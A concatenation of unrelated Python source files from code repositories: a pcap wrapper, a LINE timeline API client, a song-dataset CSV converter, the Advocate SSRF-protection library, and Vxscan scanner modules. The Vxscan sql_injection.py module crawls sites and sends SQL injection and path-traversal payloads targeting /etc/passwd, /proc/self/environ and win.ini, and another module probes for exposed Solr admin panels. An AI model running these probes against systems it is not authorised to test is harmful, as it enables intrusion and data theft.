def open_dead(*args): return _pcap.pcapObject_open_dead(*args)
def open_offline(*args): return _pcap.pcapObject_open_offline(*args)
def dump_open(*args): return _pcap.pcapObject_dump_open(*args)
def setnonblock(*args): return _pcap.pcapObject_setnonblock(*args)
def getnonblock(*args): return _pcap.pcapObject_getnonblock(*args)
def setfilter(*args): return _pcap.pcapObject_setfilter(*args)
def loop(*args): return _pcap.pcapObject_loop(*args)
def dispatch(*args): return _pcap.pcapObject_dispatch(*args)
def next(*args): return _pcap.pcapObject_next(*args)
def datalink(*args): return _pcap.pcapObject_datalink(*args)
def datalinks(*args): return _pcap.pcapObject_datalinks(*args)
def snapshot(*args): return _pcap.pcapObject_snapshot(*args)
def is_swapped(*args): return _pcap.pcapObject_is_swapped(*args)
def major_version(*args): return _pcap.pcapObject_major_version(*args)
def minor_version(*args): return _pcap.pcapObject_minor_version(*args)
def stats(*args): return _pcap.pcapObject_stats(*args)
def fileno(*args): return _pcap.pcapObject_fileno(*args)
class pcapObjectPtr(pcapObject):
def __init__(self, this):
_swig_setattr(self, pcapObject, 'this', this)
if not hasattr(self,"thisown"): _swig_setattr(self, pcapObject, 'thisown', 0)
_swig_setattr(self, pcapObject,self.__class__,pcapObject)
_pcap.pcapObject_swigregister(pcapObjectPtr)
lookupdev = _pcap.lookupdev
findalldevs = _pcap.findalldevs
lookupnet = _pcap.lookupnet
aton = _pcap.aton
ntoa = _pcap.ntoa
``` |
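A short capture loop against the wrapper above (device, filter, and counts are placeholders; opening a device requires sufficient privileges):
```python
# Illustrative only; Python 2 syntax to match the module above.
import pcap

def handler(pktlen, data, timestamp):
    print timestamp, pktlen

p = pcap.pcapObject()
dev = pcap.lookupdev()
p.open_live(dev, 65535, 1, 100)    # snaplen, promiscuous, read timeout in ms
p.setfilter('tcp port 80', 0, 0)   # BPF filter, optimize flag, netmask
p.loop(10, handler)                # hand ten packets to the callback
```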
{
"source": "5un60k0n9/sidqy",
"score": 2
} |
#### File: LINEZX/Api/channel.py
```python
import requests
from thrift.transport import THttpClient
from thrift.protocol import TCompactProtocol
from .config import Config
from tcr import ChannelService
from tcr.ttypes import *
import tempfile
class Channel(Config):
client = None
authToken = None
mid = None
channel_access_token = None
token = None
obs_token = None
refresh_token = None
def __init__(self, authToken,mid):
Config.__init__(self)
self.mid = mid
self.authToken = authToken
self.transport = THttpClient.THttpClient(self.LINE_HOST_DOMAIN, None, self.LINE_API_QUERY_PATH_FIR)
self.transport.path = self.LINE_AUTH_QUERY_PATH
self.transport.setCustomHeaders({"X-Line-Application" : self.APP_NAME,"User-Agent" : self.USER_AGENT,"X-Line-Access": authToken})
self.transport.open()
self.protocol = TCompactProtocol.TCompactProtocol(self.transport)
self.client = ChannelService.Client(self.protocol)
self.transport.path = self.LINE_CHAN_QUERY_PATH
def login(self):
result = self.client.issueChannelToken("<PASSWORD>")
self.channel_access_token = result.channelAccessToken
self.token = result.token
self.obs_token = result.obsToken
self.refresh_token = result.refreshToken
def new_post(self, text):
header = {
"Content-Type": "application/json",
"User-Agent" : self.USER_AGENT,
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
payload = {
"postInfo" : { "readPermission" : { "type" : "ALL" } },
"sourceType" : "TIMELINE",
"contents" : { "text" : text }
}
r = requests.post(self.LINE_HOST_DOMAIN + "/mh/api/v39/post/create.json",
headers = header,
data = json.dumps(payload)
)
return r.json()
def postPhoto(self,text,path):
header = {
"Content-Type": "application/json",
"User-Agent" : self.USER_AGENT,
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
payload = {
"postInfo" : { "readPermission" : { "type" : "ALL" } },
"sourceType" : "TIMELINE",
"contents" : { "text" : text ,"media" : [{u'objectId': u'F57144CF9ECC4AD2E162E68554D1A8BD1a1ab0t04ff07f6'}]}
}
r = requests.post(self.LINE_HOST_DOMAIN + "/mh/api/v39/post/create.json",
headers = header,
data = json.dumps(payload)
)
return r.json()
def like(self, mid, postid, likeType=1001):
header = {
"Content-Type" : "application/json",
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
payload = {
"likeType" : likeType,
"activityExternalId" : postid,
"actorId" : mid
}
r = requests.post(self.LINE_HOST_DOMAIN + "/mh/api/v39/like/create.json?homeId=" + mid,
headers = header,
data = json.dumps(payload)
)
return r.json()
def comment(self, mid, postid, text):
header = {
"Content-Type" : "application/json",
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
payload = {
"commentText" : text,
"activityExternalId" : postid,
"actorId" : mid
}
r = requests.post(self.LINE_HOST_DOMAIN + "/mh/api/v39/comment/create.json?homeId=" + mid,
headers = header,
data = json.dumps(payload)
)
return r.json()
def activity(self, limit=20):
header = {
"Content-Type" : "application/json",
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
r = requests.get(self.LINE_HOST_DOMAIN + "/tl/mapi/v39/activities?postLimit=" + str(limit),
headers = header
)
return r.json()
def getAlbum(self, gid):
header = {
"Content-Type" : "application/json",
"X-Line-Mid" : self.mid,
"x-lct": self.channel_access_token,
}
r = requests.get(self.LINE_HOST_DOMAIN + "/mh/album/v3/albums?type=g&sourceType=TALKROOM&homeId=" + gid,
headers = header
)
return r.json()
def changeAlbumName(self,gid,name,albumId):
header = {
"Content-Type" : "application/json",
"X-Line-Mid" : self.mid,
"x-lct": self.channel_access_token,
}
payload = {
"title": name
}
r = requests.put(self.LINE_HOST_DOMAIN + "/mh/album/v3/album/" + albumId + "?homeId=" + gid,
headers = header,
data = json.dumps(payload),
)
return r.json()
def deleteAlbum(self,gid,albumId):
header = {
"Content-Type" : "application/json",
"X-Line-Mid" : self.mid,
"x-lct": self.channel_access_token,
}
r = requests.delete(self.LINE_HOST_DOMAIN + "/mh/album/v3/album/" + albumId + "?homeId=" + gid,
headers = header,
)
return r.json()
def getNote(self,gid, commentLimit, likeLimit):
header = {
"Content-Type" : "application/json",
"X-Line-Mid" : self.mid,
"x-lct": self.channel_access_token,
}
r = requests.get(self.LINE_HOST_DOMAIN + "/mh/api/v39/post/list.json?homeId=" + gid + "&commentLimit=" + commentLimit + "&sourceType=TALKROOM&likeLimit=" + likeLimit,
headers = header
)
return r.json()
def postNote(self, gid, text):
header = {
"Content-Type": "application/json",
"User-Agent" : self.USER_AGENT,
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
payload = {"postInfo":{"readPermission":{"homeId":gid}},
"sourceType":"GROUPHOME",
"contents":{"text":text}
}
r = requests.post(self.LINE_HOST_DOMAIN + "/mh/api/v39/post/create.json",
headers = header,
data = json.dumps(payload)
)
return r.json()
def getDetail(self, mid):
header = {
"Content-Type": "application/json",
"User-Agent" : self.USER_AGENT,
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
r = requests.get(self.LINE_HOST_DOMAIN + "/ma/api/v1/userpopup/getDetail.json?userMid=" + mid,
headers = header
)
return r.json()
def getHome(self,mid):
header = {
"Content-Type": "application/json",
"User-Agent" : self.USER_AGENT,
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
r = requests.get(self.LINE_HOST_DOMAIN + "/mh/api/v39/post/list.json?homeId=" + mid + "&commentLimit=2&sourceType=LINE_PROFILE_COVER&likeLimit=6",
headers = header
)
return r.json()
def getCover(self,mid):
h = self.getHome(mid)
objId = h["result"]["homeInfo"]["objectId"]
return "http://dl.profile.line-cdn.net/myhome/c/download.nhn?userid=" + mid + "&oid=" + objId
def createAlbum(self,gid,name):
header = {
"Content-Type": "application/json",
"User-Agent" : self.USER_AGENT,
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
payload = {
"type" : "image",
"title" : name
}
r = requests.post(self.LINE_HOST_DOMAIN + "/mh/album/v3/album?count=1&auto=0&homeId=" + gid,
headers = header,
data = json.dumps(payload)
)
return r.json()
def createAlbum2(self,gid,name,path,oid):
header = {
"Content-Type": "application/json",
"User-Agent" : self.USER_AGENT,
"X-Line-Mid" : self.mid,
"x-lct" : self.channel_access_token,
}
payload = {
"type" : "image",
"title" : name
}
r = requests.post(self.LINE_HOST_DOMAIN + "/mh/album/v3/album?count=1&auto=0&homeId=" + gid,
headers = header,
data = json.dumps(payload)
)
``` |
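A hedged sketch of driving the `Channel` wrapper (the token and mids are placeholders; a valid authenticated LINE session is required):
```python
# Illustrative only: authToken and mid must come from an authenticated client.
channel = Channel(authToken='<authToken>', mid='<own mid>')
channel.login()                                   # obtains channel_access_token

print(channel.new_post('hello from the timeline API'))
print(channel.getDetail('<target mid>'))
```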
{
"source": "5un/Million-Song-Dataset-HDF5-to-CSV",
"score": 3
} |
#### File: 5un/Million-Song-Dataset-HDF5-to-CSV/msdHDF5toCSV.py
```python
import sys
import os
import glob
import hdf5_getters
import re
class Song:
songCount = 0
# songDictionary = {}
def __init__(self, songID):
self.id = songID
Song.songCount += 1
# Song.songDictionary[songID] = self
self.albumName = None
self.albumID = None
self.artistID = None
self.artistLatitude = None
self.artistLocation = None
self.artistLongitude = None
self.artistFamiliarity = None
self.artistHotttnesss = None
self.artistName = None
self.artistMBTags = None
self.artistMBTagsCount = None
self.artistTerms = None
self.danceability = None
self.energy = None
self.duration = None
self.genreList = []
self.keySignature = None
self.keySignatureConfidence = None
self.loudness = None
self.mode = None
self.lyrics = None
self.popularity = None
self.hotttnesss = None
self.tempo = None
self.timeSignature = None
self.timeSignatureConfidence = None
self.title = None
self.year = None
def displaySongCount(self):
print "Total Song Count %i" % Song.songCount
def displaySong(self):
print "ID: %s" % self.id
def main():
outputFileName = sys.argv[2]
outputFile1 = open(outputFileName, 'w')
csvRowString = ""
#################################################
#if you want to prompt the user for the order of attributes in the csv,
#leave the prompt boolean set to True
#else, set 'prompt' to False and set the order of attributes in the 'else'
#clause
prompt = False
#################################################
if prompt == True:
while prompt:
prompt = False
            csvAttributeString = raw_input("\n\nIn what order would you like the columns of the CSV file?\n" +
"Please delineate with commas. The options are: " +
"AlbumName, AlbumID, ArtistID, ArtistLatitude, ArtistLocation, ArtistLongitude,"+
" ArtistName, Danceability, Duration, KeySignature, KeySignatureConfidence, Tempo," +
" SongID, TimeSignature, TimeSignatureConfidence, Title, and Year.\n\n" +
"For example, you may write \"Title, Tempo, Duration\"...\n\n" +
"...or exit by typing 'exit'.\n\n")
csvAttributeList = re.split('\W+', csvAttributeString)
for i, v in enumerate(csvAttributeList):
csvAttributeList[i] = csvAttributeList[i].lower()
for attribute in csvAttributeList:
# print "Here is the attribute: " + attribute + " \n"
if attribute == 'AlbumID'.lower():
csvRowString += 'AlbumID'
elif attribute == 'AlbumName'.lower():
csvRowString += 'AlbumName'
elif attribute == 'ArtistID'.lower():
csvRowString += 'ArtistID'
elif attribute == 'ArtistLatitude'.lower():
csvRowString += 'ArtistLatitude'
elif attribute == 'ArtistLocation'.lower():
csvRowString += 'ArtistLocation'
elif attribute == 'ArtistLongitude'.lower():
csvRowString += 'ArtistLongitude'
elif attribute == 'ArtistName'.lower():
csvRowString += 'ArtistName'
elif attribute == 'Danceability'.lower():
csvRowString += 'Danceability'
elif attribute == 'Duration'.lower():
csvRowString += 'Duration'
elif attribute == 'KeySignature'.lower():
csvRowString += 'KeySignature'
elif attribute == 'KeySignatureConfidence'.lower():
csvRowString += 'KeySignatureConfidence'
elif attribute == 'SongID'.lower():
csvRowString += "SongID"
elif attribute == 'Tempo'.lower():
csvRowString += 'Tempo'
elif attribute == 'TimeSignature'.lower():
csvRowString += 'TimeSignature'
elif attribute == 'TimeSignatureConfidence'.lower():
csvRowString += 'TimeSignatureConfidence'
elif attribute == 'Title'.lower():
csvRowString += 'Title'
elif attribute == 'Year'.lower():
csvRowString += 'Year'
elif attribute == 'Exit'.lower():
sys.exit()
else:
prompt = True
print "=============="
print "I believe there has been an error with the input."
print "=============="
break
csvRowString += ","
lastIndex = len(csvRowString)
csvRowString = csvRowString[0:lastIndex-1]
csvRowString += "\n"
outputFile1.write(csvRowString);
csvRowString = ""
#else, if you want to hard code the order of the csv file and not prompt
#the user,
else:
#################################################
#change the order of the csv file here
#Default is to list all available attributes (in alphabetical order)
csvRowString = ("SongID,AlbumID,AlbumName,ArtistID,ArtistLatitude,ArtistLocation,"+
"ArtistLongitude,ArtistFamiliarity,ArtistHotttnesss,ArtistName,"+
"ArtistMBTags,ArtistTerms,"+
"Danceability,Energy,Duration,KeySignature,"+
"KeySignatureConfidence,Loudness,Mode,Hotttnesss,Tempo,TimeSignature,TimeSignatureConfidence,"+
"Title,Year")
#################################################
csvAttributeList = re.split('\W+', csvRowString)
for i, v in enumerate(csvAttributeList):
csvAttributeList[i] = csvAttributeList[i].lower()
outputFile1.write("SongNumber,");
outputFile1.write(csvRowString + "\n");
csvRowString = ""
#################################################
#Set the basedir here, the root directory from which the search
#for files stored in a (hierarchical data structure) will originate
basedir = sys.argv[1] # "." As the default means the current directory
ext = ".h5" #Set the extension here. H5 is the extension for HDF5 files.
#################################################
#FOR LOOP
for root, dirs, files in os.walk(basedir):
files = glob.glob(os.path.join(root,'*'+ext))
for f in files:
print f
songH5File = hdf5_getters.open_h5_file_read(f)
song = Song(str(hdf5_getters.get_song_id(songH5File)))
testDanceability = hdf5_getters.get_danceability(songH5File)
# print type(testDanceability)
# print ("Here is the danceability: ") + str(testDanceability)
song.artistID = str(hdf5_getters.get_artist_id(songH5File))
song.albumID = str(hdf5_getters.get_release_7digitalid(songH5File))
song.albumName = str(hdf5_getters.get_release(songH5File))
song.artistLatitude = str(hdf5_getters.get_artist_latitude(songH5File))
song.artistLocation = str(hdf5_getters.get_artist_location(songH5File))
song.artistLongitude = str(hdf5_getters.get_artist_longitude(songH5File))
song.artistFamiliarity = str(hdf5_getters.get_artist_familiarity(songH5File))
song.artistHotttnesss = str(hdf5_getters.get_artist_hotttnesss(songH5File))
song.artistName = str(hdf5_getters.get_artist_name(songH5File))
song.artistMBTags = ','.join(hdf5_getters.get_artist_mbtags(songH5File))
# song.artistMBTagsCount = ','.join(hdf5_getters.get_artist_mbtags_count(songH5File))
song.artistTerms = ','.join(hdf5_getters.get_artist_terms(songH5File))
song.danceability = str(hdf5_getters.get_danceability(songH5File))
song.energy = str(hdf5_getters.get_energy(songH5File))
song.duration = str(hdf5_getters.get_duration(songH5File))
# song.setGenreList()
song.keySignature = str(hdf5_getters.get_key(songH5File))
song.keySignatureConfidence = str(hdf5_getters.get_key_confidence(songH5File))
song.loudness = str(hdf5_getters.get_loudness(songH5File))
song.mode = str(hdf5_getters.get_mode(songH5File))
# song.lyrics = None
# song.popularity = None
song.hotttnesss = str(hdf5_getters.get_song_hotttnesss(songH5File))
song.tempo = str(hdf5_getters.get_tempo(songH5File))
song.timeSignature = str(hdf5_getters.get_time_signature(songH5File))
song.timeSignatureConfidence = str(hdf5_getters.get_time_signature_confidence(songH5File))
song.title = str(hdf5_getters.get_title(songH5File))
song.year = str(hdf5_getters.get_year(songH5File))
#print song count
csvRowString += str(song.songCount) + ","
for attribute in csvAttributeList:
# print "Here is the attribute: " + attribute + " \n"
if attribute == 'AlbumID'.lower():
csvRowString += song.albumID
elif attribute == 'AlbumName'.lower():
albumName = song.albumName
albumName = albumName.replace(',',"").replace('"', '""')
csvRowString += "\"" + albumName + "\""
elif attribute == 'ArtistID'.lower():
csvRowString += "\"" + song.artistID + "\""
elif attribute == 'ArtistLatitude'.lower():
latitude = song.artistLatitude
if latitude == 'nan':
latitude = ''
csvRowString += latitude
elif attribute == 'ArtistLocation'.lower():
location = song.artistLocation
location = location.replace(',','').replace('"', '""')
csvRowString += "\"" + location + "\""
elif attribute == 'ArtistLongitude'.lower():
longitude = song.artistLongitude
if longitude == 'nan':
longitude = ''
csvRowString += longitude
elif attribute == 'ArtistFamiliarity'.lower():
csvRowString += song.artistFamiliarity
elif attribute == 'ArtistHotttnesss'.lower():
csvRowString += song.artistHotttnesss
elif attribute == 'ArtistName'.lower():
csvRowString += "\"" + song.artistName.replace('"', '""') + "\""
elif attribute == 'ArtistMBTags'.lower():
csvRowString += "\"" + song.artistMBTags + "\""
# elif attribute == 'ArtistMBTagsCount'.lower():
# csvRowString += "\"" + song.artistMBTagsCount + "\""
elif attribute == 'ArtistTerms'.lower():
csvRowString += "\"" + song.artistTerms + "\""
elif attribute == 'Danceability'.lower():
csvRowString += song.danceability
elif attribute == 'Energy'.lower():
csvRowString += song.energy
elif attribute == 'Duration'.lower():
csvRowString += song.duration
elif attribute == 'KeySignature'.lower():
csvRowString += song.keySignature
elif attribute == 'KeySignatureConfidence'.lower():
# print "key sig conf: " + song.timeSignatureConfidence
csvRowString += song.keySignatureConfidence
elif attribute == 'Loudness'.lower():
csvRowString += song.loudness
elif attribute == 'Mode'.lower():
csvRowString += song.mode
elif attribute == 'SongID'.lower():
csvRowString += "\"" + song.id + "\""
elif attribute == 'Tempo'.lower():
# print "Tempo: " + song.tempo
csvRowString += song.tempo
elif attribute == 'Hotttnesss'.lower():
csvRowString += song.hotttnesss
elif attribute == 'TimeSignature'.lower():
csvRowString += song.timeSignature
elif attribute == 'TimeSignatureConfidence'.lower():
# print "time sig conf: " + song.timeSignatureConfidence
csvRowString += song.timeSignatureConfidence
elif attribute == 'Title'.lower():
csvRowString += "\"" + song.title.replace('"', '""') + "\""
elif attribute == 'Year'.lower():
csvRowString += song.year
else:
csvRowString += "Erm. This didn't work. Error. :( :(\n"
csvRowString += ","
#Remove the final comma from each row in the csv
lastIndex = len(csvRowString)
csvRowString = csvRowString[0:lastIndex-1]
csvRowString += "\n"
outputFile1.write(csvRowString)
csvRowString = ""
songH5File.close()
outputFile1.close()
main()
``` |
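The script is run as `python msdHDF5toCSV.py <dataset dir> <output.csv>`; a minimal sketch of reading a single track with `hdf5_getters` directly (the file name is a placeholder):
```python
# Illustrative only; Python 2 syntax to match the script above.
import hdf5_getters

h5 = hdf5_getters.open_h5_file_read('TRAXXXXX12903CXXXXX.h5')  # placeholder path
try:
    print hdf5_getters.get_title(h5), '-', hdf5_getters.get_artist_name(h5)
    print 'tempo:', hdf5_getters.get_tempo(h5)
finally:
    h5.close()
```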
{
"source": "5up3rc/Advocate",
"score": 3
} |
#### File: Advocate/advocate/adapters.py
```python
from requests.adapters import HTTPAdapter, DEFAULT_POOLBLOCK
from .addrvalidator import AddrValidator
from .exceptions import ProxyDisabledException
from .poolmanager import ValidatingPoolManager
class ValidatingHTTPAdapter(HTTPAdapter):
__attrs__ = HTTPAdapter.__attrs__ + ['_validator']
def __init__(self, *args, **kwargs):
self._validator = kwargs.pop('validator', None)
if not self._validator:
self._validator = AddrValidator()
super(ValidatingHTTPAdapter, self).__init__(*args, **kwargs)
def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK,
**pool_kwargs):
self._pool_connections = connections
self._pool_maxsize = maxsize
self._pool_block = block
# XXX: This would be unnecessary if the parent used a class-level
# `PoolManagerCls` attr here. Possible patch for urllib3?
self.poolmanager = ValidatingPoolManager(
num_pools=connections,
maxsize=maxsize,
block=block,
validator=self._validator,
**pool_kwargs
)
def proxy_manager_for(self, proxy, **proxy_kwargs):
"""Return urllib3 ProxyManager for the given proxy.
This method should not be called from user code, and is only
exposed for use when subclassing the
:class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
:param proxy: The proxy to return a urllib3 ProxyManager for.
:param proxy_kwargs: Extra keyword arguments used to configure the Proxy Manager.
:returns: ProxyManager
"""
raise ProxyDisabledException("Proxy support not ready")
# TODO: Look into urllib3 internals to see what _proper_ proxy support
# would entail
# if proxy not in self.proxy_manager:
# proxy_headers = self.proxy_headers(proxy)
# # proxy itself if it's internal, but we want to use the validator
# # if we bypassed the proxy for a request.
# self.proxy_manager[proxy] = proxy_from_url(
# proxy,
# proxy_headers=proxy_headers,
# num_pools=self._pool_connections,
# maxsize=self._pool_maxsize,
# block=self._pool_block,
# validator=self._validator,
# **proxy_kwargs)
#
# return self.proxy_manager[proxy]
```
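A minimal sketch of mounting the validating adapter on a plain `requests` session (default `AddrValidator` settings are assumed):
```python
import requests
from advocate import AddrValidator
from advocate.adapters import ValidatingHTTPAdapter

# Illustrative only: with a default validator, requests to private/loopback
# address ranges are rejected before a connection is made.
session = requests.Session()
adapter = ValidatingHTTPAdapter(validator=AddrValidator())
session.mount('http://', adapter)
session.mount('https://', adapter)

resp = session.get('http://example.com/')
print(resp.status_code)
```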
#### File: Advocate/test/monkeypatching.py
```python
import contextlib
import os.path
import socket
import re
import sys
import traceback
from advocate import RequestsAPIWrapper
class DisallowedConnectException(Exception):
pass
class CheckedSocket(socket.socket):
CONNECT_ALLOWED_FUNCS = {"validating_create_connection"}
# `test_testserver.py` makes raw connections to the test server to ensure it works
CONNECT_ALLOWED_FILES = {"test_testserver.py"}
_checks_enabled = True
@classmethod
@contextlib.contextmanager
def bypass_checks(cls):
try:
cls._checks_enabled = False
yield
finally:
cls._checks_enabled = True
@classmethod
def _check_frame_allowed(cls, frame):
if os.path.basename(frame[0]) in cls.CONNECT_ALLOWED_FILES:
return True
if frame[2] in cls.CONNECT_ALLOWED_FUNCS:
return True
return False
def connect(self, *args, **kwargs):
if self._checks_enabled:
stack = traceback.extract_stack()
if not any(self._check_frame_allowed(frame) for frame in stack):
raise DisallowedConnectException("calling socket.connect() unsafely!")
return super(CheckedSocket, self).connect(*args, **kwargs)
class AdvocateEnforcer(object):
"""
Forces all calls to `requests.(get/post/head/etc.)` to go through Advocate.
Used when running requests' test suite to verify that Advocate is API-compatible.
This is *NOT* appropriate for use in production.
"""
__name__ = "requests"
HOOKED_ATTRS = {"get", "post", "delete", "patch", "options", "put", "head", "session",
"Session", "request"}
ADVOCATE_RE = re.compile(r'\Aadvocate(\.|\Z)')
def __init__(self, validator):
self._orig_module = None
self._advocate_wrapper = RequestsAPIWrapper(validator)
@classmethod
def _inside_advocate_call(cls):
"""Check if we are already inside a function that's a part of Advocate"""
advocate_files = set()
for name, mod in sys.modules.items():
if not mod:
continue
if name and cls.ADVOCATE_RE.match(name):
advocate_files.add(mod.__file__)
stack_files = [x[0] for x in traceback.extract_stack()]
return advocate_files.intersection(stack_files)
@contextlib.contextmanager
def monkeypatch_requests_module(self):
"""Temporarily replace explicit requests calls with calls to Advocate"""
try:
self._orig_module = sys.modules['requests']
sys.modules['requests'] = self
yield
finally:
if self._orig_module:
sys.modules['requests'] = self._orig_module
self._orig_module = None
def __getattr__(self, item):
# We're already inside an advocate call? Pass through to the original val
should_hook = item in self.HOOKED_ATTRS
if not should_hook or not self._orig_module or self._inside_advocate_call():
return getattr(self._orig_module, item)
return getattr(self._advocate_wrapper, item)
``` |
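A sketch of how the enforcer wraps direct `requests` calls during a test run (validator construction is an assumption):
```python
from advocate import AddrValidator

# Illustrative only: while the context manager is active, plain requests.get()
# calls are routed through Advocate's RequestsAPIWrapper instead.
enforcer = AdvocateEnforcer(AddrValidator())
with enforcer.monkeypatch_requests_module():
    import requests
    requests.get('http://example.com/')
```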
{
"source": "5up3rc/Vxscan",
"score": 2
} |
#### File: Vxscan/lib/sql_injection.py
```python
import requests
from lxml import html
from lib.random_header import get_ua
from urllib import parse
import re
import concurrent.futures
from lib.settings import TIMEOUT
links = []
DBMS_ERRORS = { # regular expressions used for DBMS recognition based on error message response
"MySQL": (r"SQL syntax.*MySQL", r"Warning.*mysql_.*", r"valid MySQL result", r"MySqlClient\."),
"PostgreSQL": (r"PostgreSQL.*ERROR", r"Warning.*\Wpg_.*", r"valid PostgreSQL result", r"Npgsql\."),
"Microsoft SQL Server": (
r"Driver.* SQL[\-\_\ ]*Server", r"OLE DB.* SQL Server", r"(\W|\A)SQL Server.*Driver", r"Warning.*mssql_.*",
r"(\W|\A)SQL Server.*[0-9a-fA-F]{8}", r"(?s)Exception.*\WSystem\.Data\.SqlClient\.",
r"(?s)Exception.*\WRoadhouse\.Cms\."),
"Microsoft Access": (r"Microsoft Access Driver", r"JET Database Engine", r"Access Database Engine"),
"Oracle": (
r"\bORA-[0-9][0-9][0-9][0-9]", r"Oracle error", r"Oracle.*Driver", r"Warning.*\Woci_.*", r"Warning.*\Wora_.*"),
"IBM DB2": (r"CLI Driver.*DB2", r"DB2 SQL error", r"\bdb2_\w+\("),
"SQLite": (r"SQLite/JDBCDriver", r"SQLite.Exception", r"System.Data.SQLite.SQLiteException", r"Warning.*sqlite_.*",
r"Warning.*SQLite3::", r"\[SQLITE_ERROR\]"),
"Sybase": (r"(?i)Warning.*sybase.*", r"Sybase message", r"Sybase.*Server message.*"),
}
class Getoutofloop(Exception):
pass
OUT = []
def sqli(qurl):
global OUT
payload = {
"'", "%2527", "')", " AnD 7738=8291"
}
LFI_payload = {'../../../../etc/passwd|root:', '../../../../etc/group|root:', 'random.php|Failed opening',
'file://c:/windows/win.ini|drivers', '/proc/self/environ|USER='}
try:
for _ in payload:
url = qurl + _
r = requests.get(url, headers=get_ua(), timeout=TIMEOUT)
for (dbms, regex) in ((dbms, regex) for dbms in DBMS_ERRORS for regex in DBMS_ERRORS[dbms]):
if re.search(regex, r.text):
result = '{} SQLi:{}'.format(dbms, qurl)
OUT.append(result)
raise Getoutofloop
for i in LFI_payload:
url = ''
lfi, pattern = i.split('|')
if re.search(r'=\w+\.\w{3}$', qurl):
url = re.sub(r'\w+\.\w{3}$', lfi, qurl)
elif re.search('=\w+', qurl):
url = re.sub(r'\w+$', lfi, qurl)
r = requests.get(url, headers=get_ua(), timeout=TIMEOUT)
if re.search(pattern, r.text, re.S):
OUT.append('LFI: {}'.format(url))
break
except:
pass
def parse_html(host):
urls = []
global links
try:
        exts = ['asp', 'php', 'jsp', 'do', 'aspx', 'action']
r = requests.get(host, headers=get_ua(), timeout=3)
tmp = html.document_fromstring(r.text)
tmp.make_links_absolute(host)
link = tmp.iterlinks()
for i in link:
i = i[2]
ext = parse.urlparse(i)[2].split('.')[-1]
if ext in exts:
                # URLs that already carry query parameters go straight into the list; the rest need a second crawl pass
if re.search('=', i) or re.search('/\?\w+=\w+', i):
links.append(i)
else:
urls.append(i)
except:
pass
return urls
def get_urls(result):
host = []
_ = []
for i in set(result):
        # use urlparse to strip query parameters so duplicate URLs (same netloc + path) are dropped
url = parse.urlparse(i)
if url.netloc + url.path not in _:
host.append(i)
_.append(url.netloc + url.path)
with concurrent.futures.ThreadPoolExecutor(
max_workers=30) as executor:
executor.map(sqli, host)
def sql_check(host):
global links, OUT
result = parse_html(host)
with concurrent.futures.ThreadPoolExecutor(
max_workers=30) as executor:
executor.map(parse_html, result)
get_urls(links)
return OUT
if __name__ == "__main__":
host = 'https://elasticsearch.cn/'
print(sql_check(host))
```
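A small sketch of how the `DBMS_ERRORS` fingerprint table is applied to a response body (the sample error text is made up):
```python
import re

# Illustrative only: `body` would normally be the text of a probed response.
body = "You have an error in your SQL syntax; check the manual for your MySQL server version"
for dbms, patterns in DBMS_ERRORS.items():
    if any(re.search(p, body) for p in patterns):
        print('error message looks like', dbms)
```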
#### File: Vxscan/script/solr_unauthorized_access.py
```python
from lib.verify import verify
from lib.random_header import get_ua
import requests
vuln = ['solr']
def check(ip, ports, apps):
if verify(vuln, ports, apps):
try:
url = 'http://' + ip
url = url + '/solr/'
g = requests.get(url, headers=get_ua(), timeout=5)
            if g.status_code == 200 and 'Solr Admin' in g.text and 'Dashboard' in g.text:
                return 'Apache Solr Admin leak'
except Exception:
pass
``` |
{
"source": "5up3rc/wispy",
"score": 3
} |
#### File: wispy/wispy/grammar.py
```python
import re
from modgrammar import (
Grammar, OR, WORD, REPEAT, ANY_EXCEPT,
OPTIONAL, ANY, EXCEPT,
LIST_OF, REF, WHITESPACE,
)
from modgrammar.extras import RE
# pylint: disable=invalid-name
def RE_LITERAL(regex, *args, regex_flags=re.I | re.MULTILINE, **kwargs):
""" A Literal grammar which uses a regular expression instead
of a simple string check.
This has the benefit that certain flags can be applied to the
regex, before building the grammar, using *regex_flags* keyword argument.
By default, using *RE_LITERAL* ignores the case of the match.
"""
regex = re.compile(regex, regex_flags)
return RE(regex, *args, **kwargs)
def ignore_case_literals(*args):
""" Receive a list of strings and return a list of grammars
for each of those strings.
In this case, the grammars ignores the case of the match.
"""
return list(map(RE_LITERAL, args))
class EscapedCharacter(Grammar):
"""An escaped character is a way to assign a special interpretation
to a character by giving it a prefix Backtick character."""
grammar = ("\u0060", ANY)
class Colon(Grammar):
grammar = "\u003A"
class Dimension(Grammar):
grammar_whitespace_mode = "optional"
grammar = REPEAT((",", OPTIONAL(WHITESPACE)))
class NonAmpersandCharacter(Grammar):
grammar = ANY_EXCEPT("&", max=1)
class DoubleQuoteCharacter(Grammar):
grammar = OR("\u0022", "\u201C", "\u201D", "\u201E")
class NonDoubleQuoteCharacter(Grammar):
grammar = EXCEPT(ANY, DoubleQuoteCharacter, max=1)
class NonDoubleQuoteCharacters(Grammar):
grammar = REPEAT(NonDoubleQuoteCharacter)
class Dollars(Grammar):
grammar = REPEAT("$")
class NewLineCharacter(Grammar):
grammar = OR("\u000D\u000A", "\u000D", "\u000A")
class StatementTerminator(Grammar):
grammar = OR(";", NewLineCharacter)
class StatementTerminators(Grammar):
grammar = REPEAT(StatementTerminator)
class NewLines(Grammar):
grammar = REPEAT(NewLineCharacter)
class Dash(Grammar):
grammar = OR("\u002D", "\u2013", "\u2014", "\u2015")
class DashDash(Grammar):
grammar = (Dash, Dash)
class FormatOperator(Grammar):
grammar = (Dash, "f")
class ComparisonOperator(Grammar):
operators = ignore_case_literals(
"as", "ccontains", "ceq", "cge", "cgt", "cle", "clike",
"clt", "cmatch", "cne", "cnotcontains", "cnotlike",
"cnotmatch", "contains", "creplace", "csplit", "eq",
"ge", "gt", "icontains", "ieq", "ige", "igt", "ile",
"ilike", "ilt", "imatch", "in", "ine", "inotcontains",
"inotlike", "inotmatch", "ireplace", "is", "isnot",
"isplit", "join", "le", "like", "lt", "match", "ne",
